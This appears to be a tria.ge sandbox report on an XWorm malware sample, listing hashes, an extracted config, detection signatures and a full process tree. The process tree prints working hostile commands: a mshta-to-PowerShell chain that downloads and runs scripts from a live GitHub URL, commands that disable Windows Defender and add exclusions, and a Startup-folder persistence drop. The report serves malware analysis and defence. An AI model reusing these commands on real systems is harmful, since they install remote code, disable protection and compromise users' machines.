Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
07/11/2024, 15:44
Behavioral task
behavioral1
Sample
a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe
Resource
win7-20240903-en
General
-
Target
a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe
-
Size
10.5MB
-
MD5
5b181d2d87aa99c90b3593845a0a3257
-
SHA1
1d9dbd51f21317c839d9c9058ac1f890e5ca9245
-
SHA256
a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad
-
SHA512
7c0a73687eeb7f0917da13b0bc780e95260677349496fcca09ecbd36e2c2acfa61b86bc9cd4c3f1335c89351e384fc63664c8e4323e09b6696e0dcc0927dadc7
-
SSDEEP
196608:+2E+1M6U3b01Kpn3V+uq+VvpSdQmRJ8dA6lkaycBIGpEGo6hTOv+QKfW8fw:YL01+l+uq+VvUdQuslp9foWOv+9f
Malware Config
Extracted
https://raw.githubusercontent.com/43a1723/test/refs/heads/main/shellcode/loaderclient.ps1
Extracted
xworm
5.0
6lFXjUqCtT3P20q9
-
install_file
wintousb.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/4136-150-0x000001A6FE350000-0x000001A6FE360000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 26 IoCs
flow pid Process 13 4108 powershell.exe 26 4108 powershell.exe 28 4136 powershell.exe 29 4108 powershell.exe 30 4136 powershell.exe 31 4136 powershell.exe 34 4136 powershell.exe 41 4136 powershell.exe 44 3168 powershell.exe 46 4956 powershell.exe 47 4956 powershell.exe 48 4956 powershell.exe 49 4136 powershell.exe 59 4136 powershell.exe 63 4136 powershell.exe 64 4136 powershell.exe 67 4136 powershell.exe 69 4136 powershell.exe 70 4136 powershell.exe 71 4136 powershell.exe 77 4136 powershell.exe 78 4136 powershell.exe 79 4136 powershell.exe 80 4136 powershell.exe 81 4136 powershell.exe 86 4136 powershell.exe -
pid Process 4108 powershell.exe 3168 powershell.exe 4236 powershell.exe 1260 powershell.exe 3820 powershell.exe 4900 powershell.exe 936 powershell.exe 4956 powershell.exe 3660 powershell.exe 4136 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 2 IoCs
pid Process 4756 Updated.scr 2340 Updated.scr -
Loads dropped DLL 44 IoCs
pid Process 3520 a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe 3520 a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe 3520 a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe 3520 a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe 3520 a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe 3520 a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe 3520 a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe 3520 a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe 3520 a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe 3520 a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe 3520 a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe 3520 a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe 3520 a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe 3520 a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe 3520 a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe 3520 a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe 3520 a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe 3520 a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe 3520 a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe 3520 a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe 3520 a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe 3520 a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe 2340 Updated.scr 2340 Updated.scr 2340 Updated.scr 2340 Updated.scr 2340 Updated.scr 2340 Updated.scr 2340 Updated.scr 2340 Updated.scr 2340 Updated.scr 2340 Updated.scr 2340 Updated.scr 2340 Updated.scr 2340 Updated.scr 2340 Updated.scr 2340 Updated.scr 2340 Updated.scr 2340 Updated.scr 2340 Updated.scr 2340 Updated.scr 2340 Updated.scr 2340 Updated.scr 2340 Updated.scr -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow ioc 10 raw.githubusercontent.com 13 raw.githubusercontent.com 28 raw.githubusercontent.com 34 raw.githubusercontent.com 44 raw.githubusercontent.com 46 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 11 ip-api.com -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 688 tasklist.exe 2688 tasklist.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral2/files/0x000800000001e581-175.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 4108 powershell.exe 4108 powershell.exe 4236 powershell.exe 3660 powershell.exe 3660 powershell.exe 4236 powershell.exe 4236 powershell.exe 3660 powershell.exe 4108 powershell.exe 4136 powershell.exe 4136 powershell.exe 1260 powershell.exe 1260 powershell.exe 3820 powershell.exe 3820 powershell.exe 3820 powershell.exe 4136 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 4900 powershell.exe 4900 powershell.exe 936 powershell.exe 936 powershell.exe 936 powershell.exe 4900 powershell.exe 3168 powershell.exe 4956 powershell.exe 4956 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4108 powershell.exe Token: SeDebugPrivilege 4236 powershell.exe Token: SeIncreaseQuotaPrivilege 4632 WMIC.exe Token: SeSecurityPrivilege 4632 WMIC.exe Token: SeTakeOwnershipPrivilege 4632 WMIC.exe Token: SeLoadDriverPrivilege 4632 WMIC.exe Token: SeSystemProfilePrivilege 4632 WMIC.exe Token: SeSystemtimePrivilege 4632 WMIC.exe Token: SeProfSingleProcessPrivilege 4632 WMIC.exe Token: SeIncBasePriorityPrivilege 4632 WMIC.exe Token: SeCreatePagefilePrivilege 4632 WMIC.exe Token: SeBackupPrivilege 4632 WMIC.exe Token: SeRestorePrivilege 4632 WMIC.exe Token: SeShutdownPrivilege 4632 WMIC.exe Token: SeDebugPrivilege 4632 WMIC.exe Token: SeSystemEnvironmentPrivilege 4632 WMIC.exe Token: SeRemoteShutdownPrivilege 4632 WMIC.exe Token: SeUndockPrivilege 4632 WMIC.exe Token: SeManageVolumePrivilege 4632 WMIC.exe Token: 33 4632 WMIC.exe Token: 34 4632 WMIC.exe Token: 35 4632 WMIC.exe Token: 36 4632 WMIC.exe Token: SeDebugPrivilege 688 tasklist.exe Token: SeDebugPrivilege 3660 powershell.exe Token: SeIncreaseQuotaPrivilege 4632 WMIC.exe Token: SeSecurityPrivilege 4632 WMIC.exe Token: SeTakeOwnershipPrivilege 4632 WMIC.exe Token: SeLoadDriverPrivilege 4632 WMIC.exe Token: SeSystemProfilePrivilege 4632 WMIC.exe Token: SeSystemtimePrivilege 4632 WMIC.exe Token: SeProfSingleProcessPrivilege 4632 WMIC.exe Token: SeIncBasePriorityPrivilege 4632 WMIC.exe Token: SeCreatePagefilePrivilege 4632 WMIC.exe Token: SeBackupPrivilege 4632 WMIC.exe Token: SeRestorePrivilege 4632 WMIC.exe Token: SeShutdownPrivilege 4632 WMIC.exe Token: SeDebugPrivilege 4632 WMIC.exe Token: SeSystemEnvironmentPrivilege 4632 WMIC.exe Token: SeRemoteShutdownPrivilege 4632 WMIC.exe Token: SeUndockPrivilege 4632 WMIC.exe Token: SeManageVolumePrivilege 4632 WMIC.exe Token: 33 4632 WMIC.exe Token: 34 4632 WMIC.exe Token: 35 4632 WMIC.exe Token: 36 4632 WMIC.exe Token: SeIncreaseQuotaPrivilege 4108 powershell.exe Token: SeSecurityPrivilege 4108 powershell.exe Token: SeTakeOwnershipPrivilege 4108 powershell.exe Token: SeLoadDriverPrivilege 4108 powershell.exe Token: SeSystemProfilePrivilege 4108 powershell.exe Token: SeSystemtimePrivilege 4108 powershell.exe Token: SeProfSingleProcessPrivilege 4108 powershell.exe Token: SeIncBasePriorityPrivilege 4108 powershell.exe Token: SeCreatePagefilePrivilege 4108 powershell.exe Token: SeBackupPrivilege 4108 powershell.exe Token: SeRestorePrivilege 4108 powershell.exe Token: SeShutdownPrivilege 4108 powershell.exe Token: SeDebugPrivilege 4108 powershell.exe Token: SeSystemEnvironmentPrivilege 4108 powershell.exe Token: SeRemoteShutdownPrivilege 4108 powershell.exe Token: SeUndockPrivilege 4108 powershell.exe Token: SeManageVolumePrivilege 4108 powershell.exe Token: 33 4108 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4136 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3148 wrote to memory of 3520 3148 a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe 84 PID 3148 wrote to memory of 3520 3148 a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe 84 PID 3520 wrote to memory of 544 3520 a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe 86 PID 3520 wrote to memory of 544 3520 a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe 86 PID 544 wrote to memory of 5000 544 cmd.exe 88 PID 544 wrote to memory of 5000 544 cmd.exe 88 PID 5000 wrote to memory of 4108 5000 mshta.exe 89 PID 5000 wrote to memory of 4108 5000 mshta.exe 89 PID 3520 wrote to memory of 4696 3520 a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe 91 PID 3520 wrote to memory of 4696 3520 a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe 91 PID 3520 wrote to memory of 3704 3520 a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe 92 PID 3520 wrote to memory of 3704 3520 a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe 92 PID 3520 wrote to memory of 4452 3520 a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe 93 PID 3520 wrote to memory of 4452 3520 a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe 93 PID 3520 wrote to memory of 2792 3520 a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe 97 PID 3520 wrote to memory of 2792 3520 a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe 97 PID 4696 wrote to memory of 4236 4696 cmd.exe 99 PID 4696 wrote to memory of 4236 4696 cmd.exe 99 PID 4452 wrote to memory of 688 4452 cmd.exe 100 PID 4452 wrote to memory of 688 4452 cmd.exe 100 PID 2792 wrote to memory of 4632 2792 cmd.exe 101 PID 2792 wrote to memory of 4632 2792 cmd.exe 101 PID 3704 wrote to memory of 3660 3704 cmd.exe 102 PID 3704 wrote to memory of 3660 3704 cmd.exe 102 PID 4108 wrote to memory of 1564 4108 powershell.exe 105 PID 4108 wrote to memory of 1564 4108 powershell.exe 105 PID 1564 wrote to memory of 1576 1564 csc.exe 106 PID 1564 wrote to memory of 1576 1564 csc.exe 106 PID 4108 wrote to memory of 3560 4108 powershell.exe 107 PID 4108 wrote to memory of 3560 4108 powershell.exe 107 PID 4108 wrote to memory of 4136 4108 powershell.exe 108 PID 4108 wrote to memory of 4136 4108 powershell.exe 108 PID 4136 wrote to memory of 1260 4136 powershell.exe 116 PID 4136 wrote to memory of 1260 4136 powershell.exe 116 PID 4136 wrote to memory of 3820 4136 powershell.exe 118 PID 4136 wrote to memory of 3820 4136 powershell.exe 118 PID 4108 wrote to memory of 4756 4108 powershell.exe 123 PID 4108 wrote to memory of 4756 4108 powershell.exe 123 PID 4756 wrote to memory of 2340 4756 Updated.scr 124 PID 4756 wrote to memory of 2340 4756 Updated.scr 124 PID 2340 wrote to memory of 1652 2340 Updated.scr 125 PID 2340 wrote to memory of 1652 2340 Updated.scr 125 PID 1652 wrote to memory of 3028 1652 cmd.exe 128 PID 1652 wrote to memory of 3028 1652 cmd.exe 128 PID 3028 wrote to memory of 3168 3028 mshta.exe 129 PID 3028 wrote to memory of 3168 3028 mshta.exe 129 PID 2340 wrote to memory of 812 2340 Updated.scr 131 PID 2340 wrote to memory of 812 2340 Updated.scr 131 PID 2340 wrote to memory of 232 2340 Updated.scr 132 PID 2340 wrote to memory of 232 2340 Updated.scr 132 PID 2340 wrote to memory of 4056 2340 Updated.scr 133 PID 2340 wrote to memory of 4056 2340 Updated.scr 133 PID 4056 wrote to memory of 2688 4056 cmd.exe 137 PID 4056 wrote to memory of 2688 4056 cmd.exe 137 PID 232 wrote to memory of 936 232 cmd.exe 138 PID 232 wrote to memory of 936 232 cmd.exe 138 PID 812 wrote to memory of 4900 812 cmd.exe 139 PID 812 wrote to memory of 4900 812 cmd.exe 139 PID 2340 wrote to memory of 3212 2340 Updated.scr 140 PID 2340 wrote to memory of 3212 2340 Updated.scr 140 PID 3212 wrote to memory of 3944 3212 cmd.exe 142 PID 3212 wrote to memory of 3944 3212 cmd.exe 142 PID 3168 wrote to memory of 1280 3168 powershell.exe 143 PID 3168 wrote to memory of 1280 3168 powershell.exe 143 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 512 attrib.exe 3560 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe"C:\Users\Admin\AppData\Local\Temp\a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3148 -
C:\Users\Admin\AppData\Local\Temp\a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe"C:\Users\Admin\AppData\Local\Temp\a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3520 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mshta vbscript:CreateObject("WScript.Shell").Run("powershell -command ""iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') | iex""",0)(window.close)3⤵
- Suspicious use of WriteProcessMemory
PID:544 -
C:\Windows\system32\mshta.exemshta vbscript:CreateObject("WScript.Shell").Run("powershell -command ""iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') | iex""",0)(window.close)4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5000 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') | iex"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4108 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\i1gbcrd3\i1gbcrd3.cmdline"6⤵
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC246.tmp" "c:\Users\Admin\AppData\Local\Temp\i1gbcrd3\CSCE3D5F4668ACC485AB9DAB5329E7E9C5C.TMP"7⤵PID:1576
-
-
-
C:\Windows\system32\attrib.exe"C:\Windows\system32\attrib.exe" +h +s C:\ProgramData\Loader..{21EC2020-3AEA-1069-A2DD-08002B30309D}6⤵
- Views/modifies file attributes
PID:3560
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://raw.githubusercontent.com/43a1723/test/refs/heads/main/shellcode/loaderclient.ps1'))6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4136 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1260
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3820
-
-
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Updated.scr"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Updated.scr" /S6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4756 -
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Updated.scr"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Updated.scr" /S7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2340 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mshta vbscript:CreateObject("WScript.Shell").Run("powershell -command ""iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') | iex""",0)(window.close)8⤵
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Windows\system32\mshta.exemshta vbscript:CreateObject("WScript.Shell").Run("powershell -command ""iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') | iex""",0)(window.close)9⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') | iex"10⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3168 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5yknzxhi\5yknzxhi.cmdline"11⤵PID:1280
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES838.tmp" "c:\Users\Admin\AppData\Local\Temp\5yknzxhi\CSC7B2901BD54542CF89AF151962A25DE7.TMP"12⤵PID:4736
-
-
-
C:\Windows\system32\attrib.exe"C:\Windows\system32\attrib.exe" +h +s C:\ProgramData\Loader..{21EC2020-3AEA-1069-A2DD-08002B30309D}11⤵
- Views/modifies file attributes
PID:512
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://raw.githubusercontent.com/43a1723/test/refs/heads/main/shellcode/loaderclient.ps1'))11⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4956
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Updated.scr'"8⤵
- Suspicious use of WriteProcessMemory
PID:812 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Updated.scr'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4900
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"8⤵
- Suspicious use of WriteProcessMemory
PID:232 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:936
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"8⤵
- Suspicious use of WriteProcessMemory
PID:4056 -
C:\Windows\system32\tasklist.exetasklist /FO LIST9⤵
- Enumerates processes with tasklist
PID:2688
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"8⤵
- Suspicious use of WriteProcessMemory
PID:3212 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid9⤵PID:3944
-
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:4696 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4236
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"3⤵
- Suspicious use of WriteProcessMemory
PID:3704 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3660
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4452 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:688
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4632
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
10.5MB
MD55b181d2d87aa99c90b3593845a0a3257
SHA11d9dbd51f21317c839d9c9058ac1f890e5ca9245
SHA256a4613e749b66fc8f70489561f15be5753d34869476b6cf8c14c8b0788ef582ad
SHA5127c0a73687eeb7f0917da13b0bc780e95260677349496fcca09ecbd36e2c2acfa61b86bc9cd4c3f1335c89351e384fc63664c8e4323e09b6696e0dcc0927dadc7
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
944B
MD5189ec01f87a0a6843521200e2859d6e7
SHA11defcfde95f9fb3c30c0e51c2d0525f7cec975fd
SHA2561c363708dc8e0152c2a9a7cbe6f0e49c05d9c6b386233f5d1990d1ab224463d0
SHA51216da3d65d923278908a7d909b056b5460cd6544a2bd863704cbb9d53095dee3aa70375703024af5dfd272397e0cff2eeeaca800d3770a72859f31907979da7e0
-
Filesize
1KB
MD5a794538e98e5d6f25fb64ed43c9626ba
SHA1514989a49791ea6ac39073afe722dbf7b17015c5
SHA256078337b8c30eff7d52472559ee40b2e56e2f8900ff68926f13143af1f9f11c7a
SHA5121bab4410c2e72c04e47b5d0a32eee24f0faf1c9405216f7adfc11fbe3327f3bf847a2d3f8940f37cca2b351c7cb21fcf670f3f06bf0cfca4ac4ec9c5df9f8d62
-
Filesize
1KB
MD557083d1f73175efe776a890869edae35
SHA108f2c69e7c6de875b72bea8323bb42650f3d52ef
SHA25638851b4ed8b4ca95fc49628b94a805d99057a6abb01016265d1c74e150099150
SHA5129723c14e1214bf9518b3131bf269fd1d324af8ebeb34e548f3fd5c04bc97175d996600c9d4162f1d60def7a65116108f7d4a0b63997544ac37678933f8b352a0
-
Filesize
106KB
MD5870fea4e961e2fbd00110d3783e529be
SHA1a948e65c6f73d7da4ffde4e8533c098a00cc7311
SHA25676fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644
SHA5120b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88
-
Filesize
801KB
MD5ee3d454883556a68920caaedefbc1f83
SHA145b4d62a6e7db022e52c6159eef17e9d58bec858
SHA256791e7195d7df47a21466868f3d7386cff13f16c51fcd0350bf4028e96278dff1
SHA512e404adf831076d27680cc38d3879af660a96afc8b8e22ffd01647248c601f3c6c4585d7d7dc6bbd187660595f6a48f504792106869d329aa1a0f3707d7f777c6
-
Filesize
81KB
MD5bbe89cf70b64f38c67b7bf23c0ea8a48
SHA144577016e9c7b463a79b966b67c3ecc868957470
SHA256775fbc6e9a4c7e9710205157350f3d6141b5a9e8f44cb07b3eac38f2789c8723
SHA5123ee72ba60541116bbca1a62db64074276d40ad8ed7d0ca199a9c51d65c3f0762a8ef6d0e1e9ebf04bf4efe1347f120e4bc3d502dd288339b4df646a59aad0ec1
-
Filesize
177KB
MD5ebb660902937073ec9695ce08900b13d
SHA1881537acead160e63fe6ba8f2316a2fbbb5cb311
SHA25652e5a0c3ca9b0d4fc67243bd8492f5c305ff1653e8d956a2a3d9d36af0a3e4fd
SHA51219d5000ef6e473d2f533603afe8d50891f81422c59ae03bead580412ec756723dc3379310e20cd0c39e9683ce7c5204791012e1b6b73996ea5cb59e8d371de24
-
Filesize
119KB
MD5ca4cef051737b0e4e56b7d597238df94
SHA1583df3f7ecade0252fdff608eb969439956f5c4a
